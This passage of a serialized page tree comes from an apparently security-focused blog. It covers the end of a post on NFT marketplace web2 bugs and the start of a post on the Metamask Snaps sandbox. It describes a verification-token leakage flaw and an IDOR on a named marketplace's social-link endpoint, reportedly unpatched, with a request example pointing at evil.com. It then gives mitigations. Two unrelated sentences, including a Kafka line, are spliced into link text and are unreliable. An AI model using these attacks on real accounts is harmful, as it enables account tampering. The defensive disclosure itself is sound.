",{"type":28,"tag":87,"props":34428,"children":34431},{"href":34429,"rel":34430},"https://auth0.com/docs/get-started/identity-fundamentals/authentication-and-authorization",[91],[34432],{"type":33,"value":34433},"great misfortune has occured",{"type":33,"value":141},{"type":28,"tag":75,"props":34436,"children":34438},{"id":34437},"verification-token-leakage",[34439],{"type":33,"value":34440},"Verification Token Leakage",{"type":28,"tag":29,"props":34442,"children":34443},{},[34444],{"type":33,"value":34445},"When a user signs up for a service or creates an account that requires email verification, the system generates a unique token and sends it to the provided email address.",{"type":28,"tag":29,"props":34447,"children":34448},{},[34449],{"type":33,"value":34450},"This token is usually a random combination of letters, numbers, and symbols that are designed to be difficult to guess. The user is then instructed to verify their email by clicking a link that was sent to their inbox. However, if the email verification flow is not implemented correctly, it can result in security vulnerabilities.",{"type":28,"tag":29,"props":34452,"children":34453},{},[34454,34458],{"type":28,"tag":2583,"props":34455,"children":34456},{},[34457],{"type":33,"value":448},{"type":33,"value":34459},"\nWhile reviewing the Tensor website source code, we found a feature that allowed us to send verification emails to any email with a spoofed verification link. This could potentially result in the leakage of email verification codes, enabling an attacker to associate a victim’s email with their own account.",{"type":28,"tag":29,"props":34461,"children":34462},{},[34463],{"type":33,"value":34464},"Here's the breakdown.",{"type":28,"tag":29,"props":34466,"children":34467},{},[34468],{"type":33,"value":34469},"First, we send the verification link to a user's email:",{"type":28,"tag":201,"props":34471,"children":34472},{"style":203},[34473],{"type":28,"tag":206,"props":34474,"children":34478},{"src":34475,"alt":34476,"style":34477},"/posts/web2-bug-repellant-instructions/token-leakage.png","token-leakage","max-height:650px;",[],{"type":28,"tag":29,"props":34480,"children":34481},{},[34482],{"type":33,"value":34483},"If the user clicks on the spoofed URL, their token will be stolen, allowing the attacker to link their account to the victim’s email.",{"type":28,"tag":75,"props":34485,"children":34487},{"id":34486},"idor",[34488],{"type":33,"value":34489},"IDOR",{"type":28,"tag":29,"props":34491,"children":34492},{},[34493],{"type":28,"tag":2583,"props":34494,"children":34495},{},[34496,34498,34505],{"type":33,"value":34497},"As Gregor Samsa awoke one morning from uneasy dreams he found himself transformed in his bed into a gigantic ",{"type":28,"tag":87,"props":34499,"children":34502},{"href":34500,"rel":34501},"https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html",[91],[34503],{"type":33,"value":34504},"insect",{"type":33,"value":141},{"type":28,"tag":29,"props":34507,"children":34508},{},[34509,34511,34517],{"type":33,"value":34510},"During a security assessment of the ",{"type":28,"tag":87,"props":34512,"children":34515},{"href":34513,"rel":34514},"https://rocki.com",[91],[34516],{"type":33,"value":30938},{"type":33,"value":34518},", a critical vulnerability known as an Insecure Direct Object Reference (IDOR) was identified within the social link modification functionality. Exploiting this vulnerability enables an attacker to modify the social media links of other users without proper authorization.",{"type":28,"tag":29,"props":34520,"children":34521},{},[34522],{"type":33,"value":34523},"The specific vulnerable endpoint was identified as a POST request to /api/user/modifySocialLink, which is responsible for handling requests to update social media links associated with user accounts. This endpoint requires two parameters: \"newLink\" to specify the desired social media link and \"id\" to indicate the user's ID.",{"type":28,"tag":29,"props":34525,"children":34526},{},[34527],{"type":33,"value":34528},"Now, to exploit this vulnerability, an attacker can intercept or modify the request being sent to the \"POST /api/user/modifySocialLink\" endpoint. By manipulating the \"id\" parameter with the user ID of another user, the attacker is able to bypass proper authorization checks and modify the social media link associated with the targeted user's account.",{"type":28,"tag":29,"props":34530,"children":34531},{},[34532,34534,34540,34542,34547],{"type":33,"value":34533},"Here is an example of a request that modifies another user's social media link to ",{"type":28,"tag":98,"props":34535,"children":34537},{"className":34536},[],[34538],{"type":33,"value":34539},"https://evil.com/",{"type":33,"value":34541},". To achieve this, we simply changed the ",{"type":28,"tag":98,"props":34543,"children":34545},{"className":34544},[],[34546],{"type":33,"value":3156},{"type":33,"value":34548}," field value to one that belongs to another user:",{"type":28,"tag":29,"props":34550,"children":34551},{},[34552],{"type":28,"tag":206,"props":34553,"children":34555},{"alt":7,"src":34554},"/posts/web2-bug-repellant-instructions/idor-1.png",[],{"type":28,"tag":29,"props":34557,"children":34558},{},[34559],{"type":33,"value":34560},"The following screenshot is the response to our request:",{"type":28,"tag":29,"props":34562,"children":34563},{},[34564],{"type":28,"tag":206,"props":34565,"children":34567},{"alt":7,"src":34566},"/posts/web2-bug-repellant-instructions/idor-2.png",[],{"type":28,"tag":63,"props":34569,"children":34571},{"id":34570},"preventative-action-steps-for-marketplaces",[34572],{"type":28,"tag":4995,"props":34573,"children":34574},{},[34575],{"type":33,"value":34576},"Preventative Action Steps for Marketplaces",{"type":28,"tag":29,"props":34578,"children":34579},{},[34580],{"type":33,"value":34581},"To mitigate the vulnerabilities we’ve discussed, NFT marketplaces must prioritize the implementation of robust security measures. Below, we outline potential mitigations that can help platforms enhance their security posture and protect users and their valuable digital assets.",{"type":28,"tag":29,"props":34583,"children":34584},{},[34585,34587,34592,34594,34600],{"type":33,"value":34586},"First and foremost, NFT marketplaces should prioritize security by strengthening their input validation and output encoding processes. This can be done by encoding untrusted data with HTML entities in backend or using ",{"type":28,"tag":98,"props":34588,"children":34590},{"className":34589},[],[34591],{"type":33,"value":1779},{"type":33,"value":34593}," instead of ",{"type":28,"tag":98,"props":34595,"children":34597},{"className":34596},[],[34598],{"type":33,"value":34599},"innerHTML",{"type":33,"value":34601}," in client-side:",{"type":28,"tag":234,"props":34603,"children":34605},{"className":31015,"code":34604,"language":31017,"meta":7,"style":7},"document.getElementById('nftCollectionName').innerText = nftCollectionName;\n",[34606],{"type":28,"tag":98,"props":34607,"children":34608},{"__ignoreMap":7},[34609],{"type":28,"tag":116,"props":34610,"children":34611},{"class":245,"line":246},[34612,34616,34620,34625,34629,34634,34638,34642,34646,34651],{"type":28,"tag":116,"props":34613,"children":34614},{"style":272},[34615],{"type":33,"value":1156},{"type":28,"tag":116,"props":34617,"children":34618},{"style":266},[34619],{"type":33,"value":141},{"type":28,"tag":116,"props":34621,"children":34622},{"style":282},[34623],{"type":33,"value":34624},"getElementById",{"type":28,"tag":116,"props":34626,"children":34627},{"style":266},[34628],{"type":33,"value":313},{"type":28,"tag":116,"props":34630,"children":34631},{"style":563},[34632],{"type":33,"value":34633},"'nftCollectionName'",{"type":28,"tag":116,"props":34635,"children":34636},{"style":266},[34637],{"type":33,"value":1484},{"type":28,"tag":116,"props":34639,"children":34640},{"style":272},[34641],{"type":33,"value":1779},{"type":28,"tag":116,"props":34643,"children":34644},{"style":370},[34645],{"type":33,"value":2226},{"type":28,"tag":116,"props":34647,"children":34648},{"style":272},[34649],{"type":33,"value":34650}," nftCollectionName",{"type":28,"tag":116,"props":34652,"children":34653},{"style":266},[34654],{"type":33,"value":384},{"type":28,"tag":29,"props":34656,"children":34657},{},[34658],{"type":33,"value":34659},"However, rendering HTML or markdown user input is intended. In these cases, dangerous HTML tags need to be validated and sanitized via consolidated libraries like DomPurify:",{"type":28,"tag":234,"props":34661,"children":34663},{"className":31015,"code":34662,"language":31017,"meta":7,"style":7},"var sanitizedInput = DOMPurify.sanitize(userInput);\n",[34664],{"type":28,"tag":98,"props":34665,"children":34666},{"__ignoreMap":7},[34667],{"type":28,"tag":116,"props":34668,"children":34669},{"class":245,"line":246},[34670,34675,34680,34684,34689,34693,34698,34702,34707],{"type":28,"tag":116,"props":34671,"children":34672},{"style":376},[34673],{"type":33,"value":34674},"var",{"type":28,"tag":116,"props":34676,"children":34677},{"style":272},[34678],{"type":33,"value":34679}," sanitizedInput",{"type":28,"tag":116,"props":34681,"children":34682},{"style":370},[34683],{"type":33,"value":2226},{"type":28,"tag":116,"props":34685,"children":34686},{"style":272},[34687],{"type":33,"value":34688}," DOMPurify",{"type":28,"tag":116,"props":34690,"children":34691},{"style":266},[34692],{"type":33,"value":141},{"type":28,"tag":116,"props":34694,"children":34695},{"style":282},[34696],{"type":33,"value":34697},"sanitize",{"type":28,"tag":116,"props":34699,"children":34700},{"style":266},[34701],{"type":33,"value":313},{"type":28,"tag":116,"props":34703,"children":34704},{"style":272},[34705],{"type":33,"value":34706},"userInput",{"type":28,"tag":116,"props":34708,"children":34709},{"style":266},[34710],{"type":33,"value":895},{"type":28,"tag":29,"props":34712,"children":34713},{},[34714,34716,34723],{"type":33,"value":34715},"This can effectively mitigate the risk of XSS attacks. With that being said, implementing security measures such as ",{"type":28,"tag":87,"props":34717,"children":34720},{"href":34718,"rel":34719},"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP",[91],[34721],{"type":33,"value":34722},"Content-Security-Policy",{"type":33,"value":34724}," (CSP) will help ensure that generated content is rendered safely, without compromising the platform's security.",{"type":28,"tag":29,"props":34726,"children":34727},{},[34728],{"type":33,"value":34729},"Furthermore, a key step is for NFT marketplaces to establish strict file upload policies. By conducting thorough checks on file types and content, platforms can prevent the upload of potentially malicious SVG files. Validating both the file extension and content type will significantly reduce the risk of SVG-based XSS attacks, ensuring a safer user experience.",{"type":28,"tag":29,"props":34731,"children":34732},{},[34733,34735,34742],{"type":33,"value":34734},"Another precaution is to implement secure redirect mechanisms. By implementing a server-side allow-list of trusted domains, NFT marketplaces can prevent open redirect vulnerabilities. This ensures that users are directed only to trusted and intended domains, safeguarding them from potential phishing or malicious attacks where the authentication code is leaked. Here we are showing an example of a secure redirect by applying an ",{"type":28,"tag":87,"props":34736,"children":34739},{"href":34737,"rel":34738},"https://www.techtarget.com/whatis/definition/whitelist",[91],[34740],{"type":33,"value":34741},"allow-list",{"type":33,"value":2358},{"type":28,"tag":234,"props":34744,"children":34746},{"className":31015,"code":34745,"language":31017,"meta":7,"style":7},"const allowDomains = ['https://allowed-domain'];\nif (!allowDomains.includes(domain)) {\n  throw new ApolloError('invalid domain');\n}\n",[34747],{"type":28,"tag":98,"props":34748,"children":34749},{"__ignoreMap":7},[34750,34779,34821,34851],{"type":28,"tag":116,"props":34751,"children":34752},{"class":245,"line":246},[34753,34757,34762,34766,34770,34775],{"type":28,"tag":116,"props":34754,"children":34755},{"style":376},[34756],{"type":33,"value":9323},{"type":28,"tag":116,"props":34758,"children":34759},{"style":272},[34760],{"type":33,"value":34761}," allowDomains",{"type":28,"tag":116,"props":34763,"children":34764},{"style":370},[34765],{"type":33,"value":2226},{"type":28,"tag":116,"props":34767,"children":34768},{"style":266},[34769],{"type":33,"value":22695},{"type":28,"tag":116,"props":34771,"children":34772},{"style":563},[34773],{"type":33,"value":34774},"'https://allowed-domain'",{"type":28,"tag":116,"props":34776,"children":34777},{"style":266},[34778],{"type":33,"value":31223},{"type":28,"tag":116,"props":34780,"children":34781},{"class":245,"line":256},[34782,34786,34790,34794,34799,34803,34808,34812,34816],{"type":28,"tag":116,"props":34783,"children":34784},{"style":260},[34785],{"type":33,"value":263},{"type":28,"tag":116,"props":34787,"children":34788},{"style":266},[34789],{"type":33,"value":269},{"type":28,"tag":116,"props":34791,"children":34792},{"style":370},[34793],{"type":33,"value":20285},{"type":28,"tag":116,"props":34795,"children":34796},{"style":272},[34797],{"type":33,"value":34798},"allowDomains",{"type":28,"tag":116,"props":34800,"children":34801},{"style":266},[34802],{"type":33,"value":141},{"type":28,"tag":116,"props":34804,"children":34805},{"style":282},[34806],{"type":33,"value":34807},"includes",{"type":28,"tag":116,"props":34809,"children":34810},{"style":266},[34811],{"type":33,"value":313},{"type":28,"tag":116,"props":34813,"children":34814},{"style":272},[34815],{"type":33,"value":32355},{"type":28,"tag":116,"props":34817,"children":34818},{"style":266},[34819],{"type":33,"value":34820},")) {\n",{"type":28,"tag":116,"props":34822,"children":34823},{"class":245,"line":293},[34824,34829,34833,34838,34842,34847],{"type":28,"tag":116,"props":34825,"children":34826},{"style":260},[34827],{"type":33,"value":34828},"  throw",{"type":28,"tag":116,"props":34830,"children":34831},{"style":376},[34832],{"type":33,"value":31582},{"type":28,"tag":116,"props":34834,"children":34835},{"style":282},[34836],{"type":33,"value":34837}," ApolloError",{"type":28,"tag":116,"props":34839,"children":34840},{"style":266},[34841],{"type":33,"value":313},{"type":28,"tag":116,"props":34843,"children":34844},{"style":563},[34845],{"type":33,"value":34846},"'invalid domain'",{"type":28,"tag":116,"props":34848,"children":34849},{"style":266},[34850],{"type":33,"value":895},{"type":28,"tag":116,"props":34852,"children":34853},{"class":245,"line":361},[34854],{"type":28,"tag":116,"props":34855,"children":34856},{"style":266},[34857],{"type":33,"value":406},{"type":28,"tag":29,"props":34859,"children":34860},{},[34861,34863,34870,34872,34879],{"type":33,"value":34862},"As ",{"type":28,"tag":87,"props":34864,"children":34867},{"href":34865,"rel":34866},"https://graphql.org/",[91],[34868],{"type":33,"value":34869},"GraphQl",{"type":33,"value":34871}," is widely utilized by NFT marketplaces, it is crucial to understand the reasons behind disabling certain features like ",{"type":28,"tag":87,"props":34873,"children":34876},{"href":34874,"rel":34875},"https://graphql.org/learn/introspection/",[91],[34877],{"type":33,"value":34878},"introspection",{"type":33,"value":34880}," in production environments. By disabling introspection, it ensures that clients are unable to query the API's schema, preventing the potential exposure of sensitive information regarding its structure and implementation. Below, we provide an example of how to achieve this using the Apollo server:",{"type":28,"tag":234,"props":34882,"children":34884},{"className":31015,"code":34883,"language":31017,"meta":7,"style":7},"const server = new ApolloServer({\n  typeDefs,\n  resolvers,\n  introspection: false,\n});\n",[34885],{"type":28,"tag":98,"props":34886,"children":34887},{"__ignoreMap":7},[34888,34917,34929,34941,34957],{"type":28,"tag":116,"props":34889,"children":34890},{"class":245,"line":246},[34891,34895,34900,34904,34908,34913],{"type":28,"tag":116,"props":34892,"children":34893},{"style":376},[34894],{"type":33,"value":9323},{"type":28,"tag":116,"props":34896,"children":34897},{"style":272},[34898],{"type":33,"value":34899}," server",{"type":28,"tag":116,"props":34901,"children":34902},{"style":370},[34903],{"type":33,"value":2226},{"type":28,"tag":116,"props":34905,"children":34906},{"style":376},[34907],{"type":33,"value":31582},{"type":28,"tag":116,"props":34909,"children":34910},{"style":282},[34911],{"type":33,"value":34912}," ApolloServer",{"type":28,"tag":116,"props":34914,"children":34915},{"style":266},[34916],{"type":33,"value":14803},{"type":28,"tag":116,"props":34918,"children":34919},{"class":245,"line":256},[34920,34925],{"type":28,"tag":116,"props":34921,"children":34922},{"style":272},[34923],{"type":33,"value":34924},"  typeDefs",{"type":28,"tag":116,"props":34926,"children":34927},{"style":266},[34928],{"type":33,"value":3178},{"type":28,"tag":116,"props":34930,"children":34931},{"class":245,"line":293},[34932,34937],{"type":28,"tag":116,"props":34933,"children":34934},{"style":272},[34935],{"type":33,"value":34936},"  resolvers",{"type":28,"tag":116,"props":34938,"children":34939},{"style":266},[34940],{"type":33,"value":3178},{"type":28,"tag":116,"props":34942,"children":34943},{"class":245,"line":361},[34944,34949,34953],{"type":28,"tag":116,"props":34945,"children":34946},{"style":272},[34947],{"type":33,"value":34948},"  introspection:",{"type":28,"tag":116,"props":34950,"children":34951},{"style":376},[34952],{"type":33,"value":1022},{"type":28,"tag":116,"props":34954,"children":34955},{"style":266},[34956],{"type":33,"value":3178},{"type":28,"tag":116,"props":34958,"children":34959},{"class":245,"line":387},[34960],{"type":28,"tag":116,"props":34961,"children":34962},{"style":266},[34963],{"type":33,"value":34964},"});\n",{"type":28,"tag":29,"props":34966,"children":34967},{},[34968,34970,34977,34979,34986],{"type":33,"value":34969},"Similarly, when ",{"type":28,"tag":87,"props":34971,"children":34974},{"href":34972,"rel":34973},"https://www.apollographql.com/blog/apollo-client/performance/batching-client-graphql-queries/",[91],[34975],{"type":33,"value":34976},"batching",{"type":33,"value":34978}," is enabled, the code should limit the number of queries that can run simultaneously and implement object request rate limiting. This additional measure helps protect the website from potential ",{"type":28,"tag":87,"props":34980,"children":34983},{"href":34981,"rel":34982},"https://en.wikipedia.org/wiki/Denial-of-service_attack",[91],[34984],{"type":33,"value":34985},"denial-of-service",{"type":33,"value":34987}," (DoS) attacks.",{"type":28,"tag":29,"props":34989,"children":34990},{},[34991],{"type":33,"value":34992},"Lastly, NFT marketplaces should pay close attention to authentication and authorization controls. Specifically, addressing third-party platform misconfiguration. Applying the least privilege principle is crucial for enhancing security.",{"type":28,"tag":29,"props":34994,"children":34995},{},[34996],{"type":33,"value":34997},"By implementing these security measures, NFT marketplaces can strengthen their security posture, build trust among users, and create a secure environment for the trading and exchange of valuable digital assets.",{"type":28,"tag":41,"props":34999,"children":35000},{"id":2506},[35001],{"type":33,"value":2509},{"type":28,"tag":29,"props":35003,"children":35004},{},[35005],{"type":33,"value":35006},"To recap, the presence of Web 2 bugs in NFT marketplaces emphasizes the need to address the underlying security issues within these platforms. Developers must prioritize not only the integrity of on-chain operations, but also the security of off-chain processes. To ensure an overall robust and trustworthy ecosystem for NFT marketplaces, developers should focus on implementing comprehensive security measures across all the components of the marketplace, engage with third party auditor, and test the entire infrastructure as necessary to identify and address any potential vulnerabilities.",{"type":28,"tag":29,"props":35008,"children":35009},{},[35010],{"type":33,"value":35011},"Most of all, it is especially crucial to educate communities about risks and security best practices. By promoting awareness and providing transparent information, platforms can empower users to make informed decisions and protect themselves against potential scams or fraudulent activities.",{"type":28,"tag":63,"props":35013,"children":35015},{"id":35014},"disclaimer",[35016],{"type":33,"value":35017},"Disclaimer",{"type":28,"tag":29,"props":35019,"children":35020},{},[35021],{"type":33,"value":35022},"Despite our consistent efforts to contact the Rocki Marketplace team regarding our findings, we unfortunately have not received a response. As a result, we decided to disclose this matter to our readers. We will continue to closely monitor the situation and remain open in helping their team resolve this issue.",{"type":28,"tag":2516,"props":35024,"children":35025},{},[35026],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":35028},[35029,35032,35038,35042,35043],{"id":28670,"depth":256,"text":28673,"children":35030},[35031],{"id":2590,"depth":293,"text":2593},{"id":30861,"depth":256,"text":30891,"children":35033},[35034,35035,35036,35037],{"id":30910,"depth":293,"text":30913},{"id":30975,"depth":293,"text":30978},{"id":33784,"depth":293,"text":33787},{"id":34071,"depth":293,"text":34074},{"id":34415,"depth":256,"text":34418,"children":35039},[35040,35041],{"id":34437,"depth":293,"text":34440},{"id":34486,"depth":293,"text":34489},{"id":34570,"depth":256,"text":34576},{"id":35014,"depth":256,"text":35017},"content:blog:2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions",{"_path":35048,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":35049,"description":35050,"author":35051,"image":35052,"date":35054,"isFeatured":19,"onBlogPage":19,"body":35055,"_type":2534,"_id":40064,"_source":2536,"_file":40065,"_stem":40066,"_extension":2539},"/blog/2023-11-01-metamask-snaps","Metamask Snaps: Playing in the Sand","A deep dig into Metamask Snaps. We explore safety considerations, environment design, and break down a property spoofing vulnerability in the Snaps sandboxing layer.",[12,13],{"src":35053,"height":13289,"width":18},"/posts/metamask-snaps/header.png","2023-11-01",{"type":25,"children":35056,"toc":40045},[35057,35061,35066,35071,35076,35082,35087,35093,35106,35111,35116,35123,35155,35161,35166,35184,35191,35197,35211,35217,35237,35501,35529,35535,35554,35939,35958,35971,36289,36310,36580,36585,36591,36596,36609,36614,36627,36886,36930,36943,36949,36963,36969,36975,36988,37025,37031,37051,37161,37188,37194,37212,37225,37231,37236,37254,37365,37370,37391,37404,37421,37521,37547,37564,37686,37712,37724,37729,37735,37741,37746,37769,37774,37779,37785,37791,37818,38220,38247,38274,38280,38311,38619,38638,38643,38668,38681,38687,38714,39008,39044,39062,39067,39102,39107,39111,39116,39123,39127,39154,39931,39951,39957,39978,40027,40031,40036,40041],{"type":28,"tag":63,"props":35058,"children":35059},{"id":18619},[35060],{"type":33,"value":18622},{"type":28,"tag":29,"props":35062,"children":35063},{},[35064],{"type":33,"value":35065},"Metamask snaps are simple modules that extend Metamask's functionality. These modules can be written by anyone, and provide useful features that the vanilla wallet doesn't.",{"type":28,"tag":29,"props":35067,"children":35068},{},[35069],{"type":33,"value":35070},"Metamask provides a sandboxed environment that allows developers to run Snap code safely, without disclosing or tampering with critical information without user permission.",{"type":28,"tag":29,"props":35072,"children":35073},{},[35074],{"type":33,"value":35075},"In this article, we'll explore exactly how the snap execution environment works. We'll then delve into a unique property spoofing vulnerability we reported in the Metamask Snaps sandbox.",{"type":28,"tag":63,"props":35077,"children":35079},{"id":35078},"sandbox-security",[35080],{"type":33,"value":35081},"Sandbox Security",{"type":28,"tag":29,"props":35083,"children":35084},{},[35085],{"type":33,"value":35086},"In the first part of the article, we'll describe how the Metamask sandbox works, and examine what it's doing to protect the security of Snaps.",{"type":28,"tag":75,"props":35088,"children":35090},{"id":35089},"permission-based-security",[35091],{"type":33,"value":35092},"Permission-based security",{"type":28,"tag":29,"props":35094,"children":35095},{},[35096,35098,35104],{"type":33,"value":35097},"Each snap is built to have only the permissions it needs to hold. These permissions are specified in the ",{"type":28,"tag":98,"props":35099,"children":35101},{"className":35100},[],[35102],{"type":33,"value":35103},"snap.manifest.json",{"type":33,"value":35105}," file and can be critical to security.",{"type":28,"tag":29,"props":35107,"children":35108},{},[35109],{"type":33,"value":35110},"Snap security is totally centered around the user, whose decisions can provide dangerous permissions to a malicious snap. Metamask warns about the risk of each permission.",{"type":28,"tag":29,"props":35112,"children":35113},{},[35114],{"type":33,"value":35115},"Here are the critical permissions possible to be given to a snap:",{"type":28,"tag":29,"props":35117,"children":35118},{},[35119],{"type":28,"tag":206,"props":35120,"children":35122},{"alt":7,"src":35121},"/posts/metamask-snaps/permissions.png",[],{"type":28,"tag":2108,"props":35124,"children":35125},{},[35126,35144],{"type":28,"tag":459,"props":35127,"children":35128},{},[35129,35135,35136,35142],{"type":28,"tag":98,"props":35130,"children":35132},{"className":35131},[],[35133],{"type":33,"value":35134},"snap_getBip44Entropy",{"type":33,"value":10659},{"type":28,"tag":98,"props":35137,"children":35139},{"className":35138},[],[35140],{"type":33,"value":35141},"snap_getBip32Entropy",{"type":33,"value":35143}," -> a malicious snap retrieving keypair leads to loss of funds",{"type":28,"tag":459,"props":35145,"children":35146},{},[35147,35153],{"type":28,"tag":98,"props":35148,"children":35150},{"className":35149},[],[35151],{"type":33,"value":35152},"endowment:transaction-insight",{"type":33,"value":35154}," -> a malicious snap getting insights of a transaction before approval can lead to frontrunning attacks",{"type":28,"tag":75,"props":35156,"children":35158},{"id":35157},"snap-execution-environment",[35159],{"type":33,"value":35160},"Snap execution environment",{"type":28,"tag":29,"props":35162,"children":35163},{},[35164],{"type":33,"value":35165},"Snaps are executed in a totally sandboxed environment which provides a safe context for executing untrusted code, and separates it from the normal execution flow. To accomplish this, Metamask uses 3 layers of security to create this safe environment:",{"type":28,"tag":455,"props":35167,"children":35168},{},[35169,35174,35179],{"type":28,"tag":459,"props":35170,"children":35171},{},[35172],{"type":33,"value":35173},"An isolated iframe",{"type":28,"tag":459,"props":35175,"children":35176},{},[35177],{"type":33,"value":35178},"LavaMoat",{"type":28,"tag":459,"props":35180,"children":35181},{},[35182],{"type":33,"value":35183},"SES (Secure EcmaScript)",{"type":28,"tag":29,"props":35185,"children":35186},{},[35187],{"type":28,"tag":206,"props":35188,"children":35190},{"alt":7,"src":35189},"/posts/metamask-snaps/environment.png",[],{"type":28,"tag":75,"props":35192,"children":35194},{"id":35193},"isolated-iframe-layer-1",[35195],{"type":33,"value":35196},"Isolated Iframe - Layer 1",{"type":28,"tag":29,"props":35198,"children":35199},{},[35200,35202,35209],{"type":33,"value":35201},"Snaps empower developers to enhance Metamask's functionality while maintaining a strong security posture. These modules execute within an ",{"type":28,"tag":87,"props":35203,"children":35206},{"href":35204,"rel":35205},"https://blog.logrocket.com/the-ultimate-guide-to-iframes/",[91],[35207],{"type":33,"value":35208},"Iframe",{"type":33,"value":35210}," environment, ensuring they are isolated and secure. To facilitate this execution, Metamask takes advantage of an iFrame sandboxing mechanism, allowing snaps to operate in a contained context.",{"type":28,"tag":443,"props":35212,"children":35214},{"id":35213},"the-framework-metamask-extension-repo",[35215],{"type":33,"value":35216},"The Framework: Metamask-Extension Repo",{"type":28,"tag":29,"props":35218,"children":35219},{},[35220,35222,35228,35230,35236],{"type":33,"value":35221},"The process of snap execution kicks off within the metamask-extension repository's ",{"type":28,"tag":98,"props":35223,"children":35225},{"className":35224},[],[35226],{"type":33,"value":35227},"metamask-controller.js",{"type":33,"value":35229}," file. Here's a glimpse of the relevant ",{"type":28,"tag":87,"props":35231,"children":35234},{"href":35232,"rel":35233},"https://github.com/MetaMask/metamask-extension/blob/4b23ea8c95bea9ea12336537bb6bda4568a99098/app/scripts/metamask-controller.js#L978",[91],[35235],{"type":33,"value":98},{"type":33,"value":4160},{"type":28,"tag":234,"props":35238,"children":35242},{"className":35239,"code":35240,"language":35241,"meta":7,"style":7},"language-javascript shiki shiki-themes slack-dark","// Import snaps-controllers\n// ...\nconst snapExecutionServiceArgs = {\n  iframeUrl: new URL(process.env.IFRAME_EXECUTION_ENVIRONMENT_URL),\n  messenger: this.controllerMessenger.getRestricted({\n    name: 'ExecutionService',\n  }),\n  setupSnapProvider: this.setupSnapProvider.bind(this),\n};\n\n// Define IFRAME_EXECUTION_ENVIRONMENT_URL\nprocess.env.IFRAME_EXECUTION_ENVIRONMENT_URL =\n  'https://execution.metamask.io/0.36.1-flask.1/index.html';\n// ...\n","javascript",[35243],{"type":28,"tag":98,"props":35244,"children":35245},{"__ignoreMap":7},[35246,35254,35262,35282,35330,35365,35382,35390,35432,35439,35446,35454,35482,35494],{"type":28,"tag":116,"props":35247,"children":35248},{"class":245,"line":246},[35249],{"type":28,"tag":116,"props":35250,"children":35251},{"style":250},[35252],{"type":33,"value":35253},"// Import snaps-controllers\n",{"type":28,"tag":116,"props":35255,"children":35256},{"class":245,"line":256},[35257],{"type":28,"tag":116,"props":35258,"children":35259},{"style":250},[35260],{"type":33,"value":35261},"// ...\n",{"type":28,"tag":116,"props":35263,"children":35264},{"class":245,"line":293},[35265,35269,35274,35278],{"type":28,"tag":116,"props":35266,"children":35267},{"style":376},[35268],{"type":33,"value":9323},{"type":28,"tag":116,"props":35270,"children":35271},{"style":272},[35272],{"type":33,"value":35273}," snapExecutionServiceArgs",{"type":28,"tag":116,"props":35275,"children":35276},{"style":370},[35277],{"type":33,"value":2226},{"type":28,"tag":116,"props":35279,"children":35280},{"style":266},[35281],{"type":33,"value":1291},{"type":28,"tag":116,"props":35283,"children":35284},{"class":245,"line":361},[35285,35290,35294,35299,35303,35308,35312,35317,35321,35326],{"type":28,"tag":116,"props":35286,"children":35287},{"style":272},[35288],{"type":33,"value":35289},"  iframeUrl:",{"type":28,"tag":116,"props":35291,"children":35292},{"style":376},[35293],{"type":33,"value":31582},{"type":28,"tag":116,"props":35295,"children":35296},{"style":282},[35297],{"type":33,"value":35298}," URL",{"type":28,"tag":116,"props":35300,"children":35301},{"style":266},[35302],{"type":33,"value":313},{"type":28,"tag":116,"props":35304,"children":35305},{"style":272},[35306],{"type":33,"value":35307},"process",{"type":28,"tag":116,"props":35309,"children":35310},{"style":266},[35311],{"type":33,"value":141},{"type":28,"tag":116,"props":35313,"children":35314},{"style":272},[35315],{"type":33,"value":35316},"env",{"type":28,"tag":116,"props":35318,"children":35319},{"style":266},[35320],{"type":33,"value":141},{"type":28,"tag":116,"props":35322,"children":35323},{"style":272},[35324],{"type":33,"value":35325},"IFRAME_EXECUTION_ENVIRONMENT_URL",{"type":28,"tag":116,"props":35327,"children":35328},{"style":266},[35329],{"type":33,"value":6408},{"type":28,"tag":116,"props":35331,"children":35332},{"class":245,"line":387},[35333,35338,35343,35347,35352,35356,35361],{"type":28,"tag":116,"props":35334,"children":35335},{"style":272},[35336],{"type":33,"value":35337},"  messenger:",{"type":28,"tag":116,"props":35339,"children":35340},{"style":376},[35341],{"type":33,"value":35342}," this",{"type":28,"tag":116,"props":35344,"children":35345},{"style":266},[35346],{"type":33,"value":141},{"type":28,"tag":116,"props":35348,"children":35349},{"style":272},[35350],{"type":33,"value":35351},"controllerMessenger",{"type":28,"tag":116,"props":35353,"children":35354},{"style":266},[35355],{"type":33,"value":141},{"type":28,"tag":116,"props":35357,"children":35358},{"style":282},[35359],{"type":33,"value":35360},"getRestricted",{"type":28,"tag":116,"props":35362,"children":35363},{"style":266},[35364],{"type":33,"value":14803},{"type":28,"tag":116,"props":35366,"children":35367},{"class":245,"line":400},[35368,35373,35378],{"type":28,"tag":116,"props":35369,"children":35370},{"style":272},[35371],{"type":33,"value":35372},"    name:",{"type":28,"tag":116,"props":35374,"children":35375},{"style":563},[35376],{"type":33,"value":35377}," 'ExecutionService'",{"type":28,"tag":116,"props":35379,"children":35380},{"style":266},[35381],{"type":33,"value":3178},{"type":28,"tag":116,"props":35383,"children":35384},{"class":245,"line":614},[35385],{"type":28,"tag":116,"props":35386,"children":35387},{"style":266},[35388],{"type":33,"value":35389},"  }),\n",{"type":28,"tag":116,"props":35391,"children":35392},{"class":245,"line":631},[35393,35398,35402,35406,35411,35415,35420,35424,35428],{"type":28,"tag":116,"props":35394,"children":35395},{"style":272},[35396],{"type":33,"value":35397},"  